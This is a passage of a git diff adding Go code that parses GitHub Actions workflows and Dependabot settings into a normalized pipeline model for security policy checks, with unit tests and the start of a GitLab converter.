+// (RunGitHubAnalysis) should use when emitting its own progress
+// update for the policy-evaluation phase, so it keeps the bar in
+// sync with what the collector reported.
+func TotalProgressStepsForPipeline(pipeline *ir.NormalizedPipeline) int {
+ if pipeline == nil {
+ return 3
+ }
+ return countUniqueActionRefs(pipeline) + 3
+}
+
+// ProgressFunc is the signature callers use to observe the progress
+// of long-running collector operations β currently the GitHub API
+// enrichment phase.
+type ProgressFunc func(step, total int, message string)
+
+func report(fn ProgressFunc, step, total int, message string) {
+ if fn != nil {
+ fn(step, total, message)
+ }
+}
+
+// enrichActionsWithAPIMetadata walks every job's steps[].uses and
+// populates Action.Metadata from the GitHub REST API. Uses a shared
+// client so duplicate `owner/repo@ref` references across workflows
+// cost a single lookup. Also resolves the tag named in a trailing
+// `# vX.Y.Z` comment so ref-version-mismatch can compare claim vs
+// reality.
+//
+// When progressFn is non-nil, emits a "Resolving " step for
+// every unique reference so the caller's spinner can track the
+// long phase. Duplicate refs only emit once because the client
+// caches and the enrichment loop iterates actions left to right.
+func enrichActionsWithAPIMetadata(pipeline *ir.NormalizedPipeline, progressFn ProgressFunc) {
+ client := NewGitHubMetadataClient()
+ if !client.Available() {
+ return
+ }
+ // Pre-count unique refs for accurate N/total ratios.
+ uniqueRefs := map[string]struct{}{}
+ for i := range pipeline.Jobs {
+ for k := range pipeline.Jobs[i].Uses {
+ uniqueRefs[pipeline.Jobs[i].Uses[k].Uses] = struct{}{}
+ }
+ }
+ total := len(uniqueRefs)
+ seen := map[string]struct{}{}
+ done := 0
+ for i := range pipeline.Jobs {
+ job := &pipeline.Jobs[i]
+ for k := range job.Uses {
+ action := &job.Uses[k]
+ if _, already := seen[action.Uses]; !already {
+ done++
+ seen[action.Uses] = struct{}{}
+ report(progressFn, done, total, fmt.Sprintf("Resolving action %s", action.Uses))
+ }
+ meta := client.Resolve(action.Uses)
+ if isZeroMetadata(meta) && action.Comment == "" {
+ continue
+ }
+ amd := &ir.ActionMetadata{
+ RepoArchived: meta.RepoArchived,
+ RefExists: meta.RefExists,
+ RefKind: meta.RefKind,
+ TagSha: meta.TagSha,
+ LatestTag: meta.LatestTag,
+ LatestReleaseSha: meta.LatestReleaseSha,
+ RefIsAmbiguous: meta.RefIsAmbiguous,
+ Advisories: meta.Advisories,
+ }
+ if action.Comment != "" {
+ amd.CommentVersion = extractVersionFromComment(action.Comment)
+ if amd.CommentVersion != "" {
+ if ownerRepo := ownerRepoFromUses(action.Uses); ownerRepo != "" {
+ amd.CommentTagSha = client.ResolveTagSha(ownerRepo, amd.CommentVersion)
+ }
+ }
+ }
+ action.Metadata = amd
+ }
+ }
+}
+
+// ownerRepoFromUses extracts "owner/repo" from a uses: value,
+// dropping any sub-path (composite-action reference) and @ref tail.
+func ownerRepoFromUses(uses string) string {
+ at := strings.Index(uses, "@")
+ if at < 0 {
+ return ""
+ }
+ head := uses[:at]
+ parts := strings.SplitN(head, "/", 3)
+ if len(parts) < 2 {
+ return ""
+ }
+ return parts[0] + "/" + parts[1]
+}
+
+// commentVersionRegex matches the version token in a trailing
+// `# vX.Y.Z` comment. Accepts `v4.1.0`, `4.1.0`, `v4` β returns the
+// first match including any `v` prefix, which is the canonical tag
+// form most actions use.
+var commentVersionRegex = regexp.MustCompile(`(?i)\bv?\d+(?:\.\d+)*(?:-[A-Za-z0-9.-]+)?\b`)
+
+func extractVersionFromComment(comment string) string {
+ return commentVersionRegex.FindString(comment)
+}
+
+// ghDependabotConfig mirrors the subset of .github/dependabot.yml the
+// dependabot-* policies care about. `updates[].insecure-external-code-
+// execution` is the critical toggle: "allow" lets Dependabot run
+// install / postinstall hooks during version resolution. `cooldown:`
+// is captured only to its presence β the exact thresholds are
+// policy-irrelevant for the missing-cooldown check.
+type ghDependabotConfig struct {
+ Updates []struct {
+ PackageEcosystem string `yaml:"package-ecosystem"`
+ InsecureExternalExec string `yaml:"insecure-external-code-execution"`
+ Cooldown any `yaml:"cooldown"`
+ } `yaml:"updates"`
+}
+
+// scanDependabotConfig reads .github/dependabot.yml (or .yaml) if it
+// exists and surfaces the list of ecosystems that re-enable insecure
+// external code execution. Missing file is not an error: the return
+// is (nil, nil) and the pipeline simply carries no dependabot data.
+func scanDependabotConfig(rootDir string) (*ir.DependabotConfig, error) {
+ for _, name := range []string{"dependabot.yml", "dependabot.yaml"} {
+ path := filepath.Join(rootDir, ".github", name)
+ data, err := os.ReadFile(path)
+ if err != nil {
+ if os.IsNotExist(err) {
+ continue
+ }
+ return nil, fmt.Errorf("read %s: %w", path, err)
+ }
+ var cfg ghDependabotConfig
+ if err := yaml.Unmarshal(data, &cfg); err != nil {
+ return nil, fmt.Errorf("parse %s: %w", path, err)
+ }
+ var insecure []string
+ var missingCooldown []string
+ for _, u := range cfg.Updates {
+ if u.InsecureExternalExec == "allow" {
+ insecure = append(insecure, u.PackageEcosystem)
+ }
+ if u.Cooldown == nil {
+ missingCooldown = append(missingCooldown, u.PackageEcosystem)
+ }
+ }
+ return &ir.DependabotConfig{
+ Path: path,
+ InsecureExecEcosystems: insecure,
+ MissingCooldownEcosystems: missingCooldown,
+ }, nil
+ }
+ return nil, nil
+}
+
+// ghWorkflowHeader mirrors the top-level shape of a GitHub Actions
+// workflow file. Using a typed struct with explicit yaml tags avoids the
+// YAML 1.1 trap where `on:` would otherwise be parsed as the boolean
+// true and silently dropped from a map[string]any root.
+type ghWorkflowHeader struct {
+ Name string `yaml:"name"`
+ On any `yaml:"on"`
+ Permissions any `yaml:"permissions"`
+ Concurrency any `yaml:"concurrency"`
+ Jobs map[string]any `yaml:"jobs"`
+}
+
+// parseGitHubWorkflowJobs extracts jobs..container, workflow-level
+// permissions, and workflow triggers from a single workflow file. Jobs
+// are emitted with a namespaced name (e.g. "ci/lint") and OriginFile
+// set to the absolute workflow path. Workflow-level `permissions:` are
+// propagated to every job that does not override them; `on:` triggers
+// are propagated uniformly so trigger-focused policies can see them at
+// the job level.
+func parseGitHubWorkflowJobs(data []byte, namespace, originFile string) ([]ir.Job, error) {
+ var wf ghWorkflowHeader
+ if err := yaml.Unmarshal(data, &wf); err != nil {
+ return nil, fmt.Errorf("yaml: %w", err)
+ }
+ if len(wf.Jobs) == 0 {
+ return nil, nil
+ }
+
+ workflowPerms := normalizeGitHubPermissions(wf.Permissions)
+ triggers := extractGitHubTriggers(wf.On)
+ jobLines := scanGitHubJobLines(data)
+ usesLines := scanGitHubUsesLines(data)
+ usesComments := scanGitHubUsesComments(data)
+ workflowHasConcurrency := wf.Concurrency != nil
+
+ jobs := make([]ir.Job, 0, len(wf.Jobs))
+ for jobName, v := range wf.Jobs {
+ section, ok := ghCastStringMap(v)
+ if !ok {
+ continue
+ }
+ job := ir.Job{
+ Name: namespace + "/" + jobName,
+ OriginFile: originFile,
+ OriginLine: jobLines[jobName],
+ Triggers: triggers,
+ WorkflowName: wf.Name,
+ WorkflowHasConcurrency: workflowHasConcurrency,
+ }
+ if _, hasJobConcurrency := section["concurrency"]; hasJobConcurrency {
+ job.JobHasConcurrency = true
+ }
+ if img, ok := parseGitHubContainer(section["container"]); ok {
+ job.Image = &img
+ }
+ if jobPerms, present := section["permissions"]; present {
+ job.Permissions = normalizeGitHubPermissions(jobPerms)
+ } else if workflowPerms != nil {
+ job.Permissions = workflowPerms
+ }
+ if scripts := extractGitHubRunScripts(section["steps"]); len(scripts) > 0 {
+ job.Scripts = scripts
+ }
+ // Aggregate job-level `env:` with every step-level `env:` into
+ // a single Variables map. The semantics differ at runtime
+ // (step-level envs only apply to their own step), but the
+ // rego policies pattern-match over template expressions in
+ // value strings β not over runtime scope β so folding them
+ // together gives a complete surface to scan. Later entries
+ // overwrite earlier ones on collisions; that is acceptable
+ // because the patterns we look for are present or absent
+ // regardless of which binding wins the collision.
+ envVars := normalizeGitHubEnv(section["env"])
+ for k, v := range extractGitHubStepEnvs(section["steps"]) {
+ if envVars == nil {
+ envVars = map[string]string{}
+ }
+ envVars[k] = v
+ }
+ if envVars != nil {
+ job.Variables = envVars
+ }
+ if uses := extractGitHubUses(section["steps"]); len(uses) > 0 {
+ jobUsesLines := usesLines[jobName]
+ for k := range uses {
+ if c, ok := usesComments[uses[k].Uses]; ok {
+ uses[k].Comment = c
+ }
+ if k < len(jobUsesLines) {
+ uses[k].Line = jobUsesLines[k]
+ }
+ }
+ job.Uses = uses
+ }
+ if jobUses, ok := section["uses"].(string); ok && jobUses != "" {
+ job.ReusableWorkflowUses = jobUses
+ if secretsVal, ok := section["secrets"].(string); ok && secretsVal == "inherit" {
+ job.SecretsInherit = true
+ }
+ }
+ if conds := collectGitHubJobConditions(section); len(conds) > 0 {
+ job.Conditions = conds
+ }
+ if env := extractGitHubJobEnvironment(section["environment"]); env != "" {
+ job.Environment = env
+ }
+ jobs = append(jobs, job)
+ }
+ return jobs, nil
+}
+
+// extractGitHubJobEnvironment normalises the two accepted forms of
+// `environment:`:
+//
+// environment: production # shorthand string
+// environment: { name: production } # long form
+//
+// The url sub-field of the long form is ignored β only the name gates
+// deployment approvals.
+func extractGitHubJobEnvironment(v any) string {
+ switch x := v.(type) {
+ case string:
+ return x
+ case map[any]any:
+ m, _ := ghCastStringMap(x)
+ if name, ok := m["name"].(string); ok {
+ return name
+ }
+ }
+ return ""
+}
+
+// collectGitHubJobConditions gathers every `if:` expression attached to
+// a job or one of its steps. The raw string is preserved (template
+// expressions, booleans, whatever) so Rego policies can pattern-match
+// without a dedicated parser. Non-string values are stringified via
+// fmt.Sprint so a bare `if: true` surfaces as "true" rather than being
+// dropped.
+func collectGitHubJobConditions(section map[string]any) []string {
+ var out []string
+ if v, ok := section["if"]; ok {
+ if s := ghStringify(v); s != "" {
+ out = append(out, s)
+ }
+ }
+ steps, ok := section["steps"].([]any)
+ if !ok {
+ return out
+ }
+ for _, s := range steps {
+ step, ok := ghCastStringMap(s)
+ if !ok {
+ continue
+ }
+ if v, ok := step["if"]; ok {
+ if str := ghStringify(v); str != "" {
+ out = append(out, str)
+ }
+ }
+ }
+ return out
+}
+
+func ghStringify(v any) string {
+ switch x := v.(type) {
+ case string:
+ return x
+ case nil:
+ return ""
+ default:
+ return fmt.Sprint(x)
+ }
+}
+
+// scanGitHubUsesComments walks the raw workflow bytes and returns a
+// map of `uses` value -> trailing `# comment`. yaml.v2 discards
+// comments during parse, so we recover them here. Used by
+// ref-version-mismatch (ISSUE-110): a `@ # v4.1.0` comment
+// tells the reviewer which version the SHA is supposed to be; the
+// policy verifies the claim against the actual tag metadata.
+func scanGitHubUsesComments(data []byte) map[string]string {
+ out := map[string]string{}
+ // Match: `uses: owner/repo@ref # comment` with any indentation
+ // and optional quotes. We also accept `- uses:` forms.
+ re := regexp.MustCompile(`^\s*-?\s*uses:\s*["']?([^"'\s#]+)["']?\s*#\s*(.+?)\s*$`)
+ for _, line := range strings.Split(string(data), "\n") {
+ m := re.FindStringSubmatch(line)
+ if m == nil {
+ continue
+ }
+ // Last wins on duplicates β identical `uses` refs in the
+ // same file are expected to carry the same comment.
+ out[m[1]] = m[2]
+ }
+ return out
+}
+
+// scanGitHubUsesLines walks the raw workflow bytes and returns, for
+// each job name, the 1-based line numbers of every `uses:` directive
+// inside that job, in file order. The yaml.v2 unmarshaller flattens
+// steps into plain maps without preserving positions, so the
+// collector re-scans the bytes and pairs each `[]ir.Action` entry
+// with the matching line by positional index. Fires for
+// ISSUE-104/110/111/114 where the reviewer needs the exact step, not
+// the enclosing job header.
+func scanGitHubUsesLines(data []byte) map[string][]int {
+ out := map[string][]int{}
+ jobHeader := regexp.MustCompile(`^ ([A-Za-z_][A-Za-z0-9_-]*)\s*:\s*(#.*)?$`)
+ usesRe := regexp.MustCompile(`^\s*-?\s*uses:\s*["']?[^"'\s#]+`)
+ lines := strings.Split(string(data), "\n")
+ inJobs := false
+ currentJob := ""
+ for i, line := range lines {
+ trimmed := strings.TrimRight(line, " \t\r")
+ if trimmed == "jobs:" {
+ inJobs = true
+ continue
+ }
+ if !inJobs {
+ continue
+ }
+ if len(trimmed) > 0 && !strings.HasPrefix(trimmed, " ") && !strings.HasPrefix(trimmed, "\t") {
+ break
+ }
+ if m := jobHeader.FindStringSubmatch(line); m != nil {
+ currentJob = m[1]
+ continue
+ }
+ if currentJob != "" && usesRe.MatchString(line) {
+ out[currentJob] = append(out[currentJob], i+1)
+ }
+ }
+ return out
+}
+
+// scanGitHubJobLines returns a map from job name to its 1-based line
+// number in the workflow source. Used to attach a file:line hint to
+// findings so editors can jump straight to the offending job. The
+// scan is deliberately simple: walk the raw bytes, find the first
+// line after `jobs:` that starts with two spaces followed by
+// `:`. YAML nesting beyond the canonical 2-space job header
+// form is not modeled β if the file uses tabs or deeper indentation
+// the line simply stays at 0 and the renderer omits the :line suffix.
+func scanGitHubJobLines(data []byte) map[string]int {
+ out := map[string]int{}
+ lines := strings.Split(string(data), "\n")
+ inJobs := false
+ jobHeader := regexp.MustCompile(`^ ([A-Za-z_][A-Za-z0-9_-]*)\s*:\s*(#.*)?$`)
+ for i, line := range lines {
+ trimmed := strings.TrimRight(line, " \t\r")
+ if trimmed == "jobs:" {
+ inJobs = true
+ continue
+ }
+ if !inJobs {
+ continue
+ }
+ // A non-indented non-empty line closes the jobs block.
+ if len(trimmed) > 0 && !strings.HasPrefix(trimmed, " ") && !strings.HasPrefix(trimmed, "\t") {
+ break
+ }
+ if m := jobHeader.FindStringSubmatch(line); m != nil {
+ if _, seen := out[m[1]]; !seen {
+ out[m[1]] = i + 1
+ }
+ }
+ }
+ return out
+}
+
+// extractGitHubUses walks `jobs..steps[]` and collects every step
+// that invokes a reusable action via `uses:`, together with the raw
+// `with:` block. Inline `run:` steps are ignored (they land in
+// Scripts via extractGitHubRunScripts). The `with:` map values are
+// kept as-is so policies can distinguish strings, booleans and
+// numbers (e.g. `persist-credentials: false` β the YAML boolean,
+// not the string "false").
+func extractGitHubUses(v any) []ir.Action {
+ stepsList, ok := v.([]any)
+ if !ok {
+ return nil
+ }
+ out := make([]ir.Action, 0, len(stepsList))
+ for _, s := range stepsList {
+ stepMap, ok := ghCastStringMap(s)
+ if !ok {
+ continue
+ }
+ uses, ok := stepMap["uses"].(string)
+ if !ok || uses == "" {
+ continue
+ }
+ action := ir.Action{Uses: uses}
+ if withMap, ok := ghCastStringMap(stepMap["with"]); ok {
+ action.With = withMap
+ }
+ out = append(out, action)
+ }
+ return out
+}
+
+// extractGitHubStepEnvs walks steps[].env and returns a flat map
+// of every name β value pair it finds. Same shape as
+// normalizeGitHubEnv so the caller can merge the two.
+func extractGitHubStepEnvs(v any) map[string]string {
+ list, ok := v.([]any)
+ if !ok {
+ return nil
+ }
+ out := map[string]string{}
+ for _, s := range list {
+ step, ok := ghCastStringMap(s)
+ if !ok {
+ continue
+ }
+ stepEnvs := normalizeGitHubEnv(step["env"])
+ for k, val := range stepEnvs {
+ out[k] = val
+ }
+ }
+ if len(out) == 0 {
+ return nil
+ }
+ return out
+}
+
+// normalizeGitHubEnv converts a workflow/job `env:` block into the
+// map[string]string shape the IR carries. YAML scalar values (strings,
+// booleans, numbers) are all stringified so policies can compare
+// uniformly against literal strings like "true".
+func normalizeGitHubEnv(v any) map[string]string {
+ m, ok := v.(map[any]any)
+ if !ok {
+ return nil
+ }
+ out := make(map[string]string, len(m))
+ for k, val := range m {
+ ks, ok := k.(string)
+ if !ok {
+ continue
+ }
+ out[ks] = fmt.Sprintf("%v", val)
+ }
+ if len(out) == 0 {
+ return nil
+ }
+ return out
+}
+
+// extractGitHubRunScripts walks `jobs..steps[]` and collects every
+// inline shell script declared via `run:`. Steps using `uses:` (actions)
+// are ignored β their behavior lives in the referenced action, not in
+// the workflow file. Empty `run:` blocks are dropped.
+func extractGitHubRunScripts(v any) []string {
+ stepsList, ok := v.([]any)
+ if !ok {
+ return nil
+ }
+ scripts := make([]string, 0, len(stepsList))
+ for _, s := range stepsList {
+ stepMap, ok := ghCastStringMap(s)
+ if !ok {
+ continue
+ }
+ if run, ok := stepMap["run"].(string); ok && run != "" {
+ scripts = append(scripts, run)
+ }
+ }
+ return scripts
+}
+
+// extractGitHubTriggers returns the sorted list of event names declared
+// under `on:`. The YAML value can be a string ("push"), a list
+// (["push", "pull_request"]) or a map keyed by event name with optional
+// filters β only the event names are preserved; their configuration is
+// dropped for now.
+func extractGitHubTriggers(v any) []string {
+ switch t := v.(type) {
+ case string:
+ return []string{t}
+ case []any:
+ out := make([]string, 0, len(t))
+ for _, e := range t {
+ if s, ok := e.(string); ok {
+ out = append(out, s)
+ }
+ }
+ sort.Strings(out)
+ return out
+ case map[any]any:
+ out := make([]string, 0, len(t))
+ for k := range t {
+ if s, ok := k.(string); ok {
+ out = append(out, s)
+ }
+ }
+ sort.Strings(out)
+ return out
+ }
+ return nil
+}
+
+// normalizeGitHubPermissions converts YAML's untyped map[any]any into a
+// JSON-friendly shape so it survives the round-trip into Rego's input.
+// String shortcuts ("write-all", "read-all") are returned as-is. Maps
+// become map[string]string.
+func normalizeGitHubPermissions(v any) any {
+ switch p := v.(type) {
+ case nil:
+ return nil
+ case string:
+ return p
+ case map[any]any:
+ out := make(map[string]string, len(p))
+ for k, vv := range p {
+ ks, kok := k.(string)
+ vs, vok := vv.(string)
+ if kok && vok {
+ out[ks] = vs
+ }
+ }
+ return out
+ default:
+ return nil
+ }
+}
+
+// parseGitHubContainer accepts both the `container: "name:tag"` shortcut
+// and the `container: { image: "name:tag", ... }` long form. When the
+// long form carries a `credentials.password`, the raw value (including
+// `${{ secrets.X }}` templates, which stay as strings) is forwarded on
+// the IR so policies can distinguish a hard-coded literal from a
+// secret reference.
+func parseGitHubContainer(v any) (ir.Image, bool) {
+ switch c := v.(type) {
+ case string:
+ return splitImageRef(c), true
+ case map[any]any:
+ m, _ := ghCastStringMap(c)
+ img, ok := m["image"].(string)
+ if !ok {
+ return ir.Image{}, false
+ }
+ out := splitImageRef(img)
+ if creds, ok := ghCastStringMap(m["credentials"]); ok {
+ if pw, ok := creds["password"].(string); ok {
+ out.CredentialsPassword = pw
+ }
+ }
+ return out, true
+ }
+ return ir.Image{}, false
+}
+
+func splitImageRef(ref string) ir.Image {
+ // Digest form takes precedence: "alpine@sha256:..."
+ if at := strings.Index(ref, "@"); at > 0 {
+ return ir.Image{Name: ref[:at], Digest: ref[at+1:]}
+ }
+ if colon := strings.LastIndex(ref, ":"); colon > 0 {
+ return ir.Image{Name: ref[:colon], Tag: ref[colon+1:]}
+ }
+ return ir.Image{Name: ref}
+}
+
+func ghCastStringMap(v any) (map[string]any, bool) {
+ m, ok := v.(map[any]any)
+ if !ok {
+ return nil, false
+ }
+ out := make(map[string]any, len(m))
+ for k, vv := range m {
+ if ks, ok := k.(string); ok {
+ out[ks] = vv
+ }
+ }
+ return out, true
+}
+
+func workflowBaseName(fileName string) string {
+ if idx := strings.LastIndex(fileName, "."); idx > 0 {
+ return fileName[:idx]
+ }
+ return fileName
+}
diff --git a/collector/github_workflows_test.go b/collector/github_workflows_test.go
new file mode 100644
index 0000000..51cf411
--- /dev/null
+++ b/collector/github_workflows_test.go
@@ -0,0 +1,292 @@
+package collector
+
+import (
+ "os"
+ "path/filepath"
+ "testing"
+
+ "github.com/getplumber/plumber/internal/ir"
+)
+
+func TestScanGitHubWorkflows_Missing(t *testing.T) {
+ tmp := t.TempDir()
+
+ pipeline, partial, err := ScanGitHubWorkflows("owner/repo", "main", tmp)
+ if err != nil {
+ t.Fatalf("unexpected error: %v", err)
+ }
+ if len(partial) != 0 {
+ t.Fatalf("expected no partial errors, got %v", partial)
+ }
+ if pipeline.Provider != ir.ProviderGitHub {
+ t.Errorf("expected provider github, got %q", pipeline.Provider)
+ }
+ if len(pipeline.Jobs) != 0 {
+ t.Errorf("expected no jobs, got %d", len(pipeline.Jobs))
+ }
+}
+
+func TestScanGitHubWorkflows_FindsAndNamespacesJobs(t *testing.T) {
+ tmp := t.TempDir()
+ wfDir := filepath.Join(tmp, ".github", "workflows")
+ if err := os.MkdirAll(wfDir, 0o755); err != nil {
+ t.Fatal(err)
+ }
+
+ ci := `name: CI
+on: push
+jobs:
+ lint:
+ runs-on: ubuntu-latest
+ container: alpine:latest
+ test:
+ runs-on: ubuntu-latest
+ container:
+ image: node:20-alpha
+`
+ release := `name: Release
+on:
+ push:
+ tags: [v*]
+jobs:
+ lint: # same name as CI's job, must not collide
+ runs-on: ubuntu-latest
+ container:
+ image: debian:bookworm
+`
+ notWorkflow := `this is not yaml workflow`
+
+ for name, content := range map[string]string{
+ "ci.yml": ci,
+ "release.yaml": release,
+ "not-a-workflow.md": notWorkflow,
+ } {
+ if err := os.WriteFile(filepath.Join(wfDir, name), []byte(content), 0o644); err != nil {
+ t.Fatal(err)
+ }
+ }
+
+ pipeline, partial, err := ScanGitHubWorkflows("owner/repo", "main", tmp)
+ if err != nil {
+ t.Fatalf("unexpected error: %v", err)
+ }
+ if len(partial) != 0 {
+ t.Fatalf("unexpected partial errors: %v", partial)
+ }
+
+ got := map[string]string{}
+ for _, j := range pipeline.Jobs {
+ tag := ""
+ if j.Image != nil {
+ tag = j.Image.Tag
+ }
+ got[j.Name] = tag
+ }
+
+ expected := map[string]string{
+ "ci/lint": "latest",
+ "ci/test": "20-alpha",
+ "release/lint": "bookworm",
+ }
+ if len(got) != len(expected) {
+ t.Fatalf("expected %d jobs, got %d: %v", len(expected), len(got), got)
+ }
+ for name, tag := range expected {
+ if got[name] != tag {
+ t.Errorf("job %q: expected tag %q, got %q", name, tag, got[name])
+ }
+ }
+}
+
+func TestScanGitHubWorkflows_TriggersPropagation(t *testing.T) {
+ tmp := t.TempDir()
+ wfDir := filepath.Join(tmp, ".github", "workflows")
+ if err := os.MkdirAll(wfDir, 0o755); err != nil {
+ t.Fatal(err)
+ }
+
+ // YAML 1.1 booleanism trap: `on` is coerced to `true` unless we use a
+ // typed struct. This fixture intentionally uses all three forms.
+ fixtures := map[string]string{
+ "string-form.yml": `name: str
+on: push
+jobs:
+ job1: { runs-on: ubuntu-latest }
+`,
+ "list-form.yml": `name: list
+on: [push, pull_request]
+jobs:
+ job2: { runs-on: ubuntu-latest }
+`,
+ "map-form.yml": `name: map
+on:
+ pull_request_target:
+ types: [opened]
+ workflow_run:
+ workflows: [CI]
+jobs:
+ job3: { runs-on: ubuntu-latest }
+`,
+ }
+ for name, content := range fixtures {
+ if err := os.WriteFile(filepath.Join(wfDir, name), []byte(content), 0o644); err != nil {
+ t.Fatal(err)
+ }
+ }
+
+ pipeline, partial, err := ScanGitHubWorkflows("owner/repo", "main", tmp)
+ if err != nil || len(partial) != 0 {
+ t.Fatalf("unexpected: err=%v partial=%v", err, partial)
+ }
+
+ got := map[string][]string{}
+ for _, j := range pipeline.Jobs {
+ got[j.Name] = j.Triggers
+ }
+
+ expected := map[string][]string{
+ "string-form/job1": {"push"},
+ "list-form/job2": {"pull_request", "push"}, // sorted
+ "map-form/job3": {"pull_request_target", "workflow_run"},
+ }
+ for name, want := range expected {
+ if !stringSliceEqual(got[name], want) {
+ t.Errorf("%s: expected triggers %v, got %v", name, want, got[name])
+ }
+ }
+}
+
+func stringSliceEqual(a, b []string) bool {
+ if len(a) != len(b) {
+ return false
+ }
+ for i := range a {
+ if a[i] != b[i] {
+ return false
+ }
+ }
+ return true
+}
+
+func TestScanGitHubWorkflows_PermissionsPropagation(t *testing.T) {
+ tmp := t.TempDir()
+ wfDir := filepath.Join(tmp, ".github", "workflows")
+ if err := os.MkdirAll(wfDir, 0o755); err != nil {
+ t.Fatal(err)
+ }
+ workflow := `name: perms
+on: push
+permissions: write-all # workflow-level
+jobs:
+ inherit:
+ runs-on: ubuntu-latest
+ override-string:
+ runs-on: ubuntu-latest
+ permissions: read-all
+ override-map:
+ runs-on: ubuntu-latest
+ permissions:
+ contents: read
+ packages: write
+`
+ if err := os.WriteFile(filepath.Join(wfDir, "perms.yml"), []byte(workflow), 0o644); err != nil {
+ t.Fatal(err)
+ }
+
+ pipeline, partial, err := ScanGitHubWorkflows("owner/repo", "main", tmp)
+ if err != nil || len(partial) != 0 {
+ t.Fatalf("unexpected: err=%v partial=%v", err, partial)
+ }
+
+ got := map[string]any{}
+ for _, j := range pipeline.Jobs {
+ got[j.Name] = j.Permissions
+ }
+
+ if got["perms/inherit"] != "write-all" {
+ t.Errorf("inherit: expected workflow-level write-all, got %#v", got["perms/inherit"])
+ }
+ if got["perms/override-string"] != "read-all" {
+ t.Errorf("override-string: expected read-all, got %#v", got["perms/override-string"])
+ }
+ mapPerms, ok := got["perms/override-map"].(map[string]string)
+ if !ok {
+ t.Fatalf("override-map: expected map, got %#v", got["perms/override-map"])
+ }
+ if mapPerms["contents"] != "read" || mapPerms["packages"] != "write" {
+ t.Errorf("override-map: unexpected values: %v", mapPerms)
+ }
+}
+
+func TestScanGitHubWorkflows_StepScriptsPropagation(t *testing.T) {
+ tmp := t.TempDir()
+ wfDir := filepath.Join(tmp, ".github", "workflows")
+ if err := os.MkdirAll(wfDir, 0o755); err != nil {
+ t.Fatal(err)
+ }
+
+ workflow := `name: scripts
+on: push
+jobs:
+ one-inline:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo single
+ mixed:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - name: build
+ run: |
+ echo build
+ make all
+ - run: echo "${PWD}"
+ only-uses:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/setup-node@v4
+`
+ if err := os.WriteFile(filepath.Join(wfDir, "scripts.yml"), []byte(workflow), 0o644); err != nil {
+ t.Fatal(err)
+ }
+
+ pipeline, partial, err := ScanGitHubWorkflows("owner/repo", "main", tmp)
+ if err != nil || len(partial) != 0 {
+ t.Fatalf("unexpected: err=%v partial=%v", err, partial)
+ }
+
+ byName := map[string][]string{}
+ for _, j := range pipeline.Jobs {
+ byName[j.Name] = j.Scripts
+ }
+
+ if got := byName["scripts/one-inline"]; len(got) != 1 || got[0] != "echo single" {
+ t.Errorf("one-inline: expected [\"echo single\"], got %v", got)
+ }
+ if got := byName["scripts/mixed"]; len(got) != 2 {
+ t.Errorf("mixed: expected 2 run scripts, got %v", got)
+ }
+ if got := byName["scripts/only-uses"]; len(got) != 0 {
+ t.Errorf("only-uses: expected no scripts, got %v", got)
+ }
+}
+
+func TestScanGitHubWorkflows_ParseErrorReportedAsPartial(t *testing.T) {
+ tmp := t.TempDir()
+ wfDir := filepath.Join(tmp, ".github", "workflows")
+ if err := os.MkdirAll(wfDir, 0o755); err != nil {
+ t.Fatal(err)
+ }
+ broken := "this: is: : not valid yaml\n - [1,\n"
+ if err := os.WriteFile(filepath.Join(wfDir, "broken.yml"), []byte(broken), 0o644); err != nil {
+ t.Fatal(err)
+ }
+
+ _, partial, err := ScanGitHubWorkflows("owner/repo", "main", tmp)
+ if err != nil {
+ t.Fatalf("expected no fatal error, got %v", err)
+ }
+ if len(partial) != 1 {
+ t.Fatalf("expected 1 partial error, got %d: %v", len(partial), partial)
+ }
+}
diff --git a/collector/gitlab_ir.go b/collector/gitlab_ir.go
new file mode 100644
index 0000000..12fdc9c
--- /dev/null
+++ b/collector/gitlab_ir.go
@@ -0,0 +1,588 @@
+package collector
+
+import (
+ "encoding/json"
+ "fmt"
+ "regexp"
+ "sort"
+ "strings"
+
+ "gopkg.in/yaml.v2"
+
+ "github.com/getplumber/plumber/gitlab"
+ "github.com/getplumber/plumber/internal/ir"
+ "github.com/getplumber/plumber/utils"
+)
+
+// overridesRegex matches CI/CD keywords that, when redefined on a job
+// inherited from an include/component/template, meaningfully override
+// the upstream behaviour. Kept in sync with control/utils.go.
+var overridesRegex = regexp.MustCompile(`(?i)"(after_script|allow_failure|artifacts|before_script|cache|coverage|dast_configuration|dependencies|environment|identity|image|inherit|interruptible|manual_confirmation|needs|pages|parallel|release|resource_group|retry|rules|script|secrets|services|stage|tags|timeout|trigger|when)":`)
+
+// ToNormalizedPipeline projects the GitLab collector outputs onto a
+// provider-agnostic IR. Phase 1b: only the fields required by the first
+// rule ported to Rego (image/mutable_tag) are mapped. Additional fields
+// (services, includes, branch protection, etc.) will be filled in as
+// each rule is migrated.
+//
+// This function is pure: no I/O, no external state. It is safe to call
+// from tests with hand-built fixtures.
+func ToNormalizedPipeline(
+ projectPath string,
+ defaultBranch string,
+ ciConfigPath string,
+ origin *GitlabPipelineOriginData,
+ images *GitlabPipelineImageData,
+ protection *GitlabProtectionAnalysisData,
+) *ir.NormalizedPipeline {
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ ProjectPath: projectPath,
+ DefaultBranch: defaultBranch,
+ }
+
+ imagesByJob := indexImagesByJob(images)
+ pipeline.Jobs = buildJobs(origin, imagesByJob, ciConfigPath)
+ pipeline.Includes = buildIncludes(origin)
+ pipeline.Branches = buildBranches(protection)
+ if origin != nil && origin.MergedConf != nil {
+ if globals := extractGitLabVariables(origin.MergedConf.GlobalVariables); len(globals) > 0 {
+ pipeline.GlobalVariables = globals
+ }
+ }
+
+ return pipeline
+}
+
+// buildBranches flattens the GitLab protection API response into
+// ir.Branch entries. Each repository branch is matched against the
+// declared protection patterns; when a pattern matches, its settings
+// are attached so policies can reason about them.
+func buildBranches(protection *GitlabProtectionAnalysisData) []ir.Branch {
+ if protection == nil || len(protection.Branches) == 0 {
+ return nil
+ }
+ out := make([]ir.Branch, 0, len(protection.Branches))
+ for _, name := range protection.Branches {
+ branch := ir.Branch{Name: name}
+ for i := range protection.BranchProtections {
+ p := &protection.BranchProtections[i]
+ if !gitlab.BranchMatchesPattern(p.ProtectionPattern, name) {
+ continue
+ }
+ branch.Protected = true
+ branch.ProtectionPattern = p.ProtectionPattern
+ branch.AllowForcePush = p.AllowForcePush
+ branch.CodeOwnerApprovalRequired = p.CodeOwnerApprovalRequired
